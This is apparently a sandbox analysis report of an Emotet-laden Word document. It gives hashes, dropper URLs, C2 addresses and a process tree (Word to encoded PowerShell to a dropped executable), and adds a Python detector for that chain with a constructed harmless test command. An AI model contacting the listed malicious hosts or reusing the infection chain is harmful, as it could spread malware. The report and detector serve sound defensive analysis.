Analysis

  • max time kernel
    27s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 07:14

General

  • Target

    85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88.doc

  • Size

    169KB

  • MD5

    0df9210729b8327d60535a0814fc8537

  • SHA1

    df7891518edacf404b9b97f26765fdfd275a8d2b

  • SHA256

    85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88

  • SHA512

    70fb89116084a4e03ef2d0f915928f63f39b6e604fff0a3744285258d884d5c819b1612598e1ced93b2eb89cb086010eeb81e96f3c16e46f326759b05d95e36e

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    http://jojofun.co.uk/loges/v7yi_9z9l1_evrg/
    http://macserwis.pl/4995371c/1_m_1dau4ki6f/
    http://kennol.pk/wp-admin/yu7d_oh2g_zmwbfmqo/
    http://lf-hj.cz/a_b3rvy_ua/
    http://www.marisqueiraobarqueiro.pt/modules/2eyu_76wd_82/

Extracted

  • Family
    emotet
  • C2
    76.27.179.47:80
    212.51.142.238:8080
    189.212.199.126:443
    61.19.246.238:443
    162.154.38.103:80
    91.211.88.52:7080
    83.110.223.58:443
    124.45.106.173:443
    116.203.32.252:8080
    109.117.53.230:443
    5.196.74.210:8080
    75.139.38.211:80
    168.235.67.138:7080
    176.111.60.55:8080
    169.239.182.217:8080
    74.208.45.104:8080
    31.31.77.83:443
    222.214.218.37:4143
    37.139.21.175:8080
    91.205.215.66:443
  • rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85d095862eac57f9468543eca0c155a633dcbe0258599cb769b157125686fd88.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1100
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e <encoded command not reproduced in this copy>
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1040
  • C:\Users\Admin\74.exe
    C:\Users\Admin\74.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:1832
    • C:\Windows\SysWOW64\mf\sechost.exe
      "C:\Windows\SysWOW64\mf\sechost.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1616
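
The chain above (WINWORD.EXE, then powersheLL.exe started with an encoded command, then the dropped 74.exe run from C:\Users\Admin, which in turn starts sechost.exe) is what a process-creation detector should key on, and the exe.dropper URLs under Malware Config are what such a detector can recover by decoding that command. The following is an added example, not code from the sandbox vendor or from this page: a Python detector run over constructed Sysmon-style Event ID 1 records. The records, the explorer.exe parent of WINWORD.EXE, and the encoded command (a harmless constructed script carrying two of the page's dropper URLs, standing in for the real payload, which the page does not reproduce) are all constructed here. The report lists powersheLL.exe at the top level rather than under WINWORD.EXE, which is consistent with a macro launching it indirectly (for instance through WMI, in which case the logged parent is WmiPrvSE.exe), so the detector also treats WmiPrvSE.exe as a suspicious parent; that is an assumption about this sample, not something the report states.

```python
"""Detect the Office -> encoded PowerShell -> dropped EXE chain from this report.

Added example; not the sandbox's code. Every event and the encoded command
below are constructed for illustration.
"""
import base64
import re

# Parents that should not normally start a script host. Assumption: WmiPrvSE.exe
# is included because macros often start PowerShell through WMI, which makes
# WmiPrvSE.exe, not WINWORD.EXE, the logged parent.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "outlook.exe", "wmiprvse.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://[^\s'\"`;,)]+", re.IGNORECASE)


def basename(path):
    """Case-folded file name of a Windows path ('powersheLL.exe' -> 'powershell.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_profile(path):
    """True for anything under C:\\Users, i.e. a user-writable location."""
    return path.lower().startswith("c:\\users\\")


def decode_encoded_command(cmdline):
    """Return the script behind -e / -ec / -enc / -EncodedCommand, or None.

    PowerShell accepts any prefix of -EncodedCommand, so match by prefix and
    case-insensitively (the sample spells the binary 'powersheLL').
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if len(flag) >= 2 and "-encodedcommand".startswith(flag):
            blob = tokens[i + 1].strip("\"'")
            try:
                # -EncodedCommand carries base64 over UTF-16LE, not UTF-8.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyse_process_event(event):
    """event: dict with ParentImage, Image, CommandLine (Sysmon Event ID 1 fields)."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    script = decode_encoded_command(event["CommandLine"]) if image in POWERSHELL else None
    return {
        "suspicious_parent": parent in SUSPICIOUS_PARENTS and image in SCRIPT_HOSTS,
        "encoded_command": script is not None,
        "urls": URL_RE.findall(script) if script else [],
        # 74.exe ran from C:\Users\Admin: an EXE executed from the user profile.
        "user_profile_exe": in_user_profile(event["Image"]) and image.endswith(".exe"),
        # sechost.exe was started by 74.exe: a child of a user-profile EXE.
        "child_of_user_profile_exe": in_user_profile(event["ParentImage"]),
    }


def scan(events):
    """Return (index, findings) for every event with at least one finding."""
    return [(i, f) for i, ev in enumerate(events)
            for f in (analyse_process_event(ev),) if any(f.values())]


# Constructed stand-in for the encoded script the page elides: a harmless loop
# over two of the dropper URLs listed under Malware Config.
CONSTRUCTED_SCRIPT = ("$u='http://jojofun.co.uk/loges/v7yi_9z9l1_evrg/,"
                      "http://macserwis.pl/4995371c/1_m_1dau4ki6f/'.Split(',');"
                      "foreach($x in $u){Write-Output $x}")
CONSTRUCTED_ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed events mirroring the report's process tree. The explorer.exe and
# WINWORD.EXE parent relationships are assumptions, not values from the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                    r'"C:\Users\Admin\AppData\Local\Temp\sample.doc"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
     "CommandLine": "powersheLL -e " + CONSTRUCTED_ENCODED},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
     "Image": r"C:\Users\Admin\74.exe",
     "CommandLine": r"C:\Users\Admin\74.exe"},
    {"ParentImage": r"C:\Users\Admin\74.exe",
     "Image": r"C:\Windows\SysWOW64\mf\sechost.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\mf\sechost.exe"'},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, basename(SAMPLE_EVENTS[index]["Image"]), findings)
```

Matching the `-e` switch by prefix is deliberate: PowerShell resolves any unambiguous prefix of `-EncodedCommand`, so a rule that only looks for the literal `-EncodedCommand` misses the short form used in this sample. Decoding with UTF-16LE is equally important; decoding the blob as UTF-8 yields interleaved NUL bytes and the URL regex finds nothing.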

Downloads

  • memory/1100-2-0x0000000008B80000-0x0000000008B84000-memory.dmp

    Filesize

    16KB

  • memory/1100-4-0x000000000ACF0000-0x000000000ACF4000-memory.dmp

    Filesize

    16KB

  • memory/1100-5-0x000000000BD70000-0x000000000BD74000-memory.dmp

    Filesize

    16KB

  • memory/1100-9-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1616-15-0x0000000000330000-0x000000000033C000-memory.dmp

    Filesize

    48KB

  • memory/1832-12-0x0000000000320000-0x000000000032C000-memory.dmp

    Filesize

    48KB